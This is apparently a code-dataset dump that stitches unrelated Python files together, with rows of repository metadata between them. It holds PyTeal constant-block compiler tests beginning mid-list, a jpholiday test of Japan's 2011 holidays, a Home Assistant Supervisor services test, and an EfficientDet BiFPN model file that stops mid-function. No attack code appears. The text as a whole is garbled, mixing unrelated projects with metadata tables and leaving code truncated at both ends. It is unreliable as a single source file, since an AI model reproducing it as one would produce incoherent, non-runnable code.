TealOp(None, Op.bytecblock, "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_bytes_mixed():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x01"),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "TMPL_BYTES_1", "0x00"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.pushbytes, "0x01", "//", "0x01"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_all():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x01"),
TealOp(None, Op.concat),
TealOp(None, Op.len),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.add),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.eq),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1", 0),
TealOp(None, Op.bytecblock, "TMPL_BYTES_1", "0x00"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.pushbytes, "0x01", "//", "0x01"),
TealOp(None, Op.concat),
TealOp(None, Op.len),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 1, "//", 1),
TealOp(None, Op.add),
TealOp(None, Op.eq),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intc():
"""Test scenario where there are more than 4 constants in the intcblock.
If the 4th constant can't fit in one varuint byte (more than 2**7) it
should be referenced with the Op.intc 4 command.
"""
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 2**7),
TealOp(None, Op.int, 2**7),
]
expected = [
TealOp(None, Op.intcblock, 0, 1, 2, 3, 2**7),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc, 4, "//", 2**7),
TealOp(None, Op.intc, 4, "//", 2**7),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_small_constant():
"""If a constant cannot be referenced using the intc_[0..3] commands
and it can be stored in one varuint it byte then Op.pushint is used.
"""
for cur in range(4, 2**7):
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, cur),
TealOp(None, Op.int, cur),
]
expected = [
TealOp(None, Op.intcblock, 0, 1, 2, 3),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.pushint, cur, "//", cur),
TealOp(None, Op.pushint, cur, "//", cur),
]
actual = createConstantBlocks(ops)
assert actual == expected
| 31.51194 | 121 | 0.541799 | 2,436 | 21,113 | 4.595238 | 0.082512 | 0.315348 | 0.378417 | 0.08442 | 0.871717 | 0.826425 | 0.796855 | 0.779346 | 0.754243 | 0.715383 | 0 | 0.059612 | 0.282527 | 21,113 | 669 | 122 | 31.559043 | 0.679364 | 0.019609 | 0 | 0.749129 | 0 | 0.003484 | 0.144924 | 0.049985 | 0 | 0 | 0.027485 | 0 | 0.038328 | 1 | 0.038328 | false | 0 | 0.003484 | 0 | 0.041812 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d9ce432b1f76671887c34a0fad8ccd22100fd884 | 2,531 | py | Python | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 179 | 2017-10-05T12:41:10.000Z | 2022-03-24T22:18:25.000Z | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 17 | 2018-10-23T00:51:13.000Z | 2021-11-22T11:40:06.000Z | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 17 | 2018-10-19T11:13:07.000Z | 2022-01-29T08:05:56.000Z | # coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2011(unittest.TestCase):
def test_holiday(self):
"""
2011年祝日
"""
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 1, 1)), '元日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 1, 10)), '成人の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 2, 11)), '建国記念の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 3, 21)), '春分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 4, 29)), '昭和の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 3)), '憲法記念日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 4)), 'みどりの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 5)), 'こどもの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 7, 18)), '海の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 9, 19)), '敬老の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 9, 23)), '秋分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 10, 10)), '体育の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 11, 3)), '文化の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 11, 23)), '勤労感謝の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 12, 23)), '天皇誕生日')
def test_count_month(self):
"""
2011年月祝日数
"""
self.assertEqual(len(jpholiday.month_holidays(2011, 1)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 2)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 3)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 4)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 5)), 3)
self.assertEqual(len(jpholiday.month_holidays(2011, 6)), 0)
self.assertEqual(len(jpholiday.month_holidays(2011, 7)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 8)), 0)
self.assertEqual(len(jpholiday.month_holidays(2011, 9)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 10)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 11)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 12)), 1)
def test_count_year(self):
"""
2011年祝日数
"""
self.assertEqual(len(jpholiday.year_holidays(2011)), 15)
| 49.627451 | 90 | 0.679968 | 326 | 2,531 | 5.131902 | 0.184049 | 0.251046 | 0.215182 | 0.233114 | 0.803347 | 0.803347 | 0.803347 | 0.750747 | 0.481769 | 0.291692 | 0 | 0.096466 | 0.172659 | 2,531 | 50 | 91 | 50.62 | 0.702483 | 0.016199 | 0 | 0 | 0 | 0 | 0.02686 | 0 | 0 | 0 | 0 | 0 | 0.8 | 1 | 0.085714 | false | 0 | 0.085714 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d9f82fcab6246e1f0b3a78199060e9cba44540b6 | 191 | py | Python | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 597 | 2017-04-27T15:10:08.000Z | 2019-12-18T16:02:57.000Z | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 1,056 | 2020-01-30T09:59:44.000Z | 2022-03-31T10:15:32.000Z | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 295 | 2020-02-03T11:30:42.000Z | 2022-03-31T18:53:14.000Z | """Test services data."""
def test_data_initial(coresys):
"""Test initial data for services."""
assert coresys.services.data.mqtt == {}
assert coresys.services.data.mysql == {}
| 23.875 | 44 | 0.670157 | 23 | 191 | 5.478261 | 0.434783 | 0.285714 | 0.333333 | 0.396825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167539 | 191 | 7 | 45 | 27.285714 | 0.792453 | 0.267016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a3f94862bbdd215bd0169fff60f6746e29f1ecf | 29,436 | py | Python | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | from functools import reduce
# from keras import layers
# from keras import initializers
# from keras import models
# from keras_ import EfficientNetB0, EfficientNetB1, EfficientNetB2
# from keras_ import EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras import initializers
from tensorflow.keras import models
from tfkeras import EfficientNetB0, EfficientNetB1, EfficientNetB2
from tfkeras import EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6
from layers import ClipBoxes, RegressBoxes, FilterDetections, wBiFPNAdd, BatchNormalization
from initializers import PriorProbability
from utils.anchors import anchors_for_shape
import numpy as np
# Per-phi (D0..D6) compound-scaling configuration, indexed by the EfficientDet
# coefficient phi. The trailing comments appear to be the original (paper)
# defaults; the active values have been reduced to a uniform, smaller
# configuration — presumably to cut memory/compute. TODO confirm intent.
w_bifpns = [64, 64, 64, 64, 64, 64, 64]#[64, 88, 112, 160, 224, 288, 384]
d_bifpns = [3, 4, 4, 4, 4, 4, 4]#[3, 4, 5, 6, 7, 7, 8]
d_heads = [3, 3, 3, 3, 3, 3, 3]#[3, 3, 3, 4, 4, 4, 5]
image_sizes = [256, 256, 256, 256, 256, 256, 256]#[512, 640, 768, 896, 1024, 1280, 1408]
# Backbone constructor for each phi.
backbones = [EfficientNetB0, EfficientNetB1, EfficientNetB2,
             EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6]
# BatchNormalization hyperparameters shared by every BN layer built below.
MOMENTUM = 0.997
EPSILON = 1e-4
def SeparableConvBlock(num_channels, kernel_size, strides, name, freeze_bn=False):
    """Build a depthwise-separable conv followed by batch normalization.

    Returns a callable that applies the two layers in sequence
    (conv first, then BN). ``freeze_bn`` is currently unused — the frozen
    BatchNormalization variant is commented out.
    """
    conv = layers.SeparableConv2D(num_channels, kernel_size=kernel_size, strides=strides, padding='same',
                                  use_bias=True, name=f'{name}/conv')
    bn = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{name}/bn')
    # bn = BatchNormalization(freeze=freeze_bn, name=f'{name}/bn')

    def apply(*args, **kwargs):
        # Convolution output feeds straight into batch norm.
        return bn(conv(*args, **kwargs))

    return apply
def ConvBlock(num_channels, kernel_size, strides, name, freeze_bn=False):
    """Build a conv -> batch norm -> ReLU stack.

    Returns a callable that threads its input through the three layers in
    order. ``freeze_bn`` is currently unused — the frozen BatchNormalization
    variant is commented out.
    """
    stack = [
        layers.Conv2D(num_channels, kernel_size=kernel_size, strides=strides, padding='same',
                      use_bias=True, name='{}_conv'.format(name)),
        layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='{}_bn'.format(name)),
        # BatchNormalization(freeze=freeze_bn, name='{}_bn'.format(name)),
        layers.ReLU(name='{}_relu'.format(name)),
    ]

    def apply(*args, **kwargs):
        out = stack[0](*args, **kwargs)
        for layer in stack[1:]:
            out = layer(out)
        return out

    return apply
def build_wBiFPN(features, num_channels, id, freeze_bn=False):
    """Build one weighted BiFPN cell (learned fusion weights via wBiFPNAdd).

    Args:
        features: for the first cell (``id == 0``), the backbone feature
            maps — the first two entries are ignored and C3-C5 are used;
            for later cells, the five outputs of the previous cell (P3-P7).
        num_channels: channel count each fused feature map is projected to.
        id: index of this cell in the stacked BiFPN; used in layer names
            (names must stay stable to load pretrained weights).
        freeze_bn: currently unused — the frozen BatchNormalization variant
            is commented out.

    Returns:
        Tuple of five feature maps, finest to coarsest.
    """
    if id == 0:
        # First cell only: take C3-C5 from the backbone, project C5 to
        # num_channels and downsample twice to synthesize P6 and P7.
        _, _, C3, C4, C5 = features
        P3_in = C3
        P4_in = C4
        P5_in = C5
        P6_in = layers.Conv2D(num_channels, kernel_size=1, padding='same', name='resample_p6/conv2d')(C5)
        P6_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='resample_p6/bn')(P6_in)
        # P6_in = BatchNormalization(freeze=freeze_bn, name='resample_p6/bn')(P6_in)
        P6_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p6/maxpool')(P6_in)
        P7_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p7/maxpool')(P6_in)
        # Top-down pathway: upsample the coarser level, fuse with the
        # (1x1-projected) input at the finer level, then swish + sep-conv.
        P7_U = layers.UpSampling2D()(P7_in)
        P6_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
        P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
        P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
        P5_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
                                name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/conv2d')(P5_in)
        P5_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
                                            name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
        # P5_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
        P6_U = layers.UpSampling2D()(P6_td)
        P5_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in_1, P6_U])
        P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
        P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
        P4_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
                                name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/conv2d')(P4_in)
        P4_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
                                            name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
        # P4_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
        P5_U = layers.UpSampling2D()(P5_td)
        P4_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in_1, P5_U])
        P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
        P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
        P3_in = layers.Conv2D(num_channels, kernel_size=1, padding='same',
                              name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/conv2d')(P3_in)
        P3_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
                                          name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
        # P3_in = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
        P4_U = layers.UpSampling2D()(P4_td)
        P3_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
        P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
        P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
        # Bottom-up pathway: downsample the finer output and fuse it with the
        # top-down intermediate plus a second 1x1 projection of the input.
        P4_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
                                name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/conv2d')(P4_in)
        P4_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
                                            name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
        # P4_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
        P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
        P4_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in_2, P4_td, P3_D])
        P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
        P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
        P5_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
                                name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/conv2d')(P5_in)
        P5_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
                                            name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
        # P5_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
        P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
        P5_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in_2, P5_td, P4_D])
        P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
        P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
        P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
        P6_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
        P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
        P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
        P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
        P7_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
        P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
        P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
    else:
        # Later cells: inputs already have num_channels, so the 1x1
        # projections are skipped; same top-down + bottom-up wiring.
        P3_in, P4_in, P5_in, P6_in, P7_in = features
        # Top-down pathway.
        P7_U = layers.UpSampling2D()(P7_in)
        P6_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
        P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
        P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
        P6_U = layers.UpSampling2D()(P6_td)
        P5_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in, P6_U])
        P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
        P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
        P5_U = layers.UpSampling2D()(P5_td)
        P4_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in, P5_U])
        P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
        P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                   name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
        P4_U = layers.UpSampling2D()(P4_td)
        P3_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
        P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
        P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
        # Bottom-up pathway.
        P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
        P4_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in, P4_td, P3_D])
        P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
        P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
        P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
        P5_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in, P5_td, P4_D])
        P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
        P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
        P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
        P6_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
        P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
        P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
        P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
        P7_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
        P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
        P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
                                    name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
    # NOTE(review): the top-down intermediates P4_td/P5_td/P6_td are returned
    # instead of the bottom-up outputs P4_out/P5_out/P6_out (which still feed
    # P7_out via the pooling chain) — confirm this is intentional.
    return P3_out, P4_td, P5_td, P6_td, P7_out
def build_BiFPN(features, num_channels, id, freeze_bn=False):
if id == 0:
_, _, C3, C4, C5 = features
P3_in = C3
P4_in = C4
P5_in = C5
P6_in = layers.Conv2D(num_channels, kernel_size=1, padding='same', name='resample_p6/conv2d')(C5)
P6_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='resample_p6/bn')(P6_in)
# P6_in = BatchNormalization(freeze=freeze_bn, name='resample_p6/bn')(P6_in)
P6_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p6/maxpool')(P6_in)
P7_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p7/maxpool')(P6_in)
P7_U = layers.UpSampling2D()(P7_in)
P6_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P5_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/conv2d')(P5_in)
P5_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
# P5_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in_1, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P4_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/conv2d')(P4_in)
P4_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
# P4_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in_1, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P3_in = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/conv2d')(P3_in)
P3_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
# P3_in = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
